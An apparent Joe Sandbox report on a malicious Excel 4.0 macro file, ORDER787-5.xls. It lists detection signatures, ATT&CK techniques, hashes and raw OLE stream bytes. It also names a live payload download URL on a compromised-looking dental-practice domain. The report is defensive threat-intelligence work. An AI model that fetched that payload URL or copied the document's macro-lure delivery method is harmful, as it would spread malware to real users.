Analysis Report ORDER787-5.xls
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for dropped file | Show sources |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Found malicious URLs in unpacked macro 4.0 sheet | Show sources |
Source: | Macro 4.0 Deobfuscator: |
Source: | JA3 fingerprint: |
Source: | File created: | Jump to behavior |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Code function: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Stream path 'Workbook' entropy: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting31 | Path Interception | Process Injection11 | Masquerading11 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | System Information Discovery24 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting31 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information21 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
4% | ReversingLabs | Script.Trojan.Heuristic |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
15% | ReversingLabs | |||
15% | ReversingLabs |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
4% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
penrithdentalimplants.com.au | 160.153.76.195 | true | false |
| unknown |
www.penrithdentalimplants.com.au | unknown | unknown | false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
true |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
160.153.76.195 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 336129 |
Start date: | 05.01.2021 |
Start time: | 13:00:07 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | ORDER787-5.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/13@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
13:00:52 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-26496-GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 327680 |
Entropy (8bit): | 7.594344556420887 |
Encrypted: | false |
SSDEEP: | 6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp |
MD5: | 1A57412AB2EDD77103FD75768BA146DD |
SHA1: | 81599A9B526C16B2A0A82CADCB8ACAAC6781EC81 |
SHA-256: | 7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917 |
SHA-512: | 7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.1104823335779463 |
Encrypted: | false |
SSDEEP: | 6:kKekMSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lWkPlE99SNxAhUegeT2 |
MD5: | 88D01B15C32DC5F54651F0A97864E0EF |
SHA1: | 1396AB210AF8B93B30E8A46FBB83DAE780B84B11 |
SHA-256: | AD6121D0521AEAE4EFA83923B306C43A8EA2B74184AE0C898F6BACB4B8046702 |
SHA-512: | 0CEA566ADBCA3DE2C4AA21799DD19B9B755A7B355953144BDB20BFF927B81E897EB3A4EEFAAA7E57D94EB9D361BC45FADA0669EFA346FEFF4F8B0E248C0C5C8C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 327680 |
Entropy (8bit): | 7.594344556420887 |
Encrypted: | false |
SSDEEP: | 6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp |
MD5: | 1A57412AB2EDD77103FD75768BA146DD |
SHA1: | 81599A9B526C16B2A0A82CADCB8ACAAC6781EC81 |
SHA-256: | 7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917 |
SHA-512: | 7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | https://www.penrithdentalimplants.com.au/ls/apperolew.png |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2128 |
Entropy (8bit): | 2.131067658554214 |
Encrypted: | false |
SSDEEP: | 24:YW7VoaaP0yGLCfVxwj4LoFjh0JtxlggL0lue:NPazfVxwji5Ax |
MD5: | A4CD320321FB7CB36DCDBE18372DB7F6 |
SHA1: | 2214C8B629049D3FCAA14F59636C884A4A2AC765 |
SHA-256: | 382EFF7970B1157CA3CC1DE889E7BBC92BA06E2E9992FFB1E515C27C5B914EC2 |
SHA-512: | 395C094254E8B9E076527D452AC039397F5ACAB0171DBA7338F4571D33771124585FDDDBB35AEDDDB0A022BC9626DBFF761850E41AEBFE0CC25CBD0CE308CA6A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2128 |
Entropy (8bit): | 2.077588804474407 |
Encrypted: | false |
SSDEEP: | 24:Ywl/V3uaP0z4GmXIfzCsf3dte3YLaFnuOlehywoy/://QaRYfGi3do3l8 |
MD5: | D2F8C79A51EC1F551B9233C6FD1083EA |
SHA1: | 73FB2CA087FB85B595A981D499ACB31C156BB71C |
SHA-256: | 5C748A589C0EEA58A5664F62DD15E3B06CC436A8E5A30918F881793A8743379B |
SHA-512: | 341687BE2080E7BA0E6D778A4C013D1742745D294D94FAED19626BF4C050048D0C0D47D838D1F7092985D3873D63CC8B78A74F6569F8D299DF82159E79581E19 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206848634864182 |
Encrypted: | false |
SSDEEP: | 1536:cGILEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cdNNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | 93F2225BF5FFD6C4E480793CA89F0CBB |
SHA1: | 901730BE002933D11806C6417D1B35C794AFB953 |
SHA-256: | 968744AFB8FBEE61678CD949E38D7B4AC80073A40A90CC1E865C56621F0A925D |
SHA-512: | F01FAEBCEDD8D7C3B4C8404387A3BEF66E95853ECDCCFDE641261A32CC12C22C81D810E3E2FB161099756F64462C3B9DBC35733C55C9A3D84E5C81FBDBC35EBD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 148333 |
Entropy (8bit): | 7.862613200850918 |
Encrypted: | false |
SSDEEP: | 3072:/wW92ouB+ctexrUW/HlaLuZl4KKB/BtVhdoMOmLtlbTy:/ZxuZexI0lSh/BbhdoMOmK |
MD5: | F172F8A0B25CB105FD588B810003BE34 |
SHA1: | A8317748F41F50D28FCCCC7CA11C74DC524D67D2 |
SHA-256: | E011EC839076E4F99839C495FA3B3BD70246EBF39B593724DA51B1E314263A0D |
SHA-512: | 5E004E3F06C46A17F4904344AECB42E7C030D1166D31AF0D904730ED689FDECA1F87A00B808D01B9E4C901BD9C4CBD35713EE77576E493BB7950455C88045D66 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.496574117992861 |
Encrypted: | false |
SSDEEP: | 12:85QhenCLgXg/XAlCPCHaXtB8XzB/lzUX+WnicvbsW1bDtZ3YilMMEpxRljKHTdJU:85vU/XTd6jHUYe7Dv3qWrNru/ |
MD5: | F477EDF49DB8F29FA1F7E8563873054A |
SHA1: | C39AC7E0ACF6C289AD7EE4FDC23C4D2E3778C550 |
SHA-256: | 3232C9EC5CC69786EEB55B4CA42C340AB196433A6F9D10B69104223F03C9FE55 |
SHA-512: | 8A43D696AE55466F73669264D320BAD18A4AB8A0DB0BCDC2ED7F446BC377FCB664B9EB300293E7835CD48B0118F9EECF727E10F1271B7BD3525985AA040E4474 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4056 |
Entropy (8bit): | 4.528803921190274 |
Encrypted: | false |
SSDEEP: | 96:8TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQ/:8bjFwg7QEbjFwg7QEbjFwg7QEbjFwg7g |
MD5: | BE347C89A9A76E5DF8F2035AF09871FF |
SHA1: | A5D5164AB3B388822846783B1D4543BA19C788C5 |
SHA-256: | 9F0967ED9573F54FB9A4EFFF1208E6DC8DF58792191F759F7B4BDBD5A3ADC0FF |
SHA-512: | 8FF4F2D97F45401FF6F53E48B1A2C56099DC71BD38BB386E7DAE90B77C9DA33A96D3FDF0905FC1687DDA31A88B4C5DE15E73270992E1CD4F63324A7B8870AFC6 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 169 |
Entropy (8bit): | 4.42743505414388 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCv:dj6kQZC3ZUkQZC3ZUkQZC3ZUkQZs |
MD5: | 4232FA4840865D1AC196D3F04B274801 |
SHA1: | BB30CFD9644E02C3A4766006AC5DDDD11684B15F |
SHA-256: | D10AC2C8001288BBB4AD0E1A10572DEC3E549158FDDC2042084613941D17ACD7 |
SHA-512: | 7ADAAF43B2E7CA5E4578B1E7F16F219CD331A50190036490FFEDA1B30E44F656D61C4848ABA6F5DD5EA365F63C346254872F6E54FD6D531394992A9954F69B18 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.881888506863549 |
TrID: |
|
File name: | ORDER787-5.xls |
File size: | 165376 |
MD5: | 1d97c6cb50c4107498e4f0e76f539f0c |
SHA1: | a4dc090837c76aed324bea19c9f62e2d47bb7bc8 |
SHA256: | 1b761a682092f8be6c7e9eef709be08a7105159a5e4ffb7722b0530fba308ba4 |
SHA512: | 08c580cbb19b3684f96ab82ec358ca42b796d52045c71d7f794f91d745b62f184d0b1c6842dd6577fb2a0b762bd236f1d1d593b3c592767788fda08739b025a3 |
SSDEEP: | 3072:6D/0mXgqPYJJv0Cl04gsDDNEnRL/WL018klfOPxHfoVsfMJETA24CLjmbzafPRj:6z/PE2hyDJEBW6plWPGi4ENmbza3 |
File Content Preview: | ........................>.......................................................c.............................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "ORDER787-5.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | True |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-01-04 17:53:11 |
Creating Application: | |
Security: | 1 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 102 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 102 |
Entropy: | 4.1769286656 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1a 00 00 00 cb e8 f1 f2 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 280 |
Entropy: | 3.26288952551 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d a t a 2 . . . . . D i g i t a l S e c u r e . . . . . d a t a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a6 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 200 |
Entropy: | 3.27412475502 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . y w . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Ctls, File Type: data, Stream Size: 68 |
---|
General | |
---|---|
Stream Path: | Ctls |
File Type: | data |
Stream Size: | 68 |
Entropy: | 3.77907363839 |
Base64 Encoded: | False |
Data ASCII: | . . . B . . . . . . . . ` . . . . . . ` . . . . . . . . . . . ( . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . |
Data Raw: | 20 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 00 02 14 00 60 01 01 80 00 00 00 00 03 02 00 00 28 01 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 d8 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 1c |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 154550 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 154550 |
Entropy: | 7.98610242414 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . . 6 > c d } . @ { . . . < 9 . ` - . . . . " . < . * . . 6 2 \\ . . . . . [ . . . . P . ( . . . . . . . . . . . . . t . . . . . \\ . p . . . ! . . . . . . . . . . { . $ 8 . . . . . . . . . ) . . 4 . | v U . [ < . t . . m . . 8 . . 4 . . . . ) 8 . o . P . . . . . N > . . . . . f . . . . . . . . . . . > . . / . . . ( / . . _ . $ F o . . l . . . . . . j h . . B . . . . . a . . . . . . . . . = . . . . . . . S . . . . . . . . . . . . . W . . . . . . t |
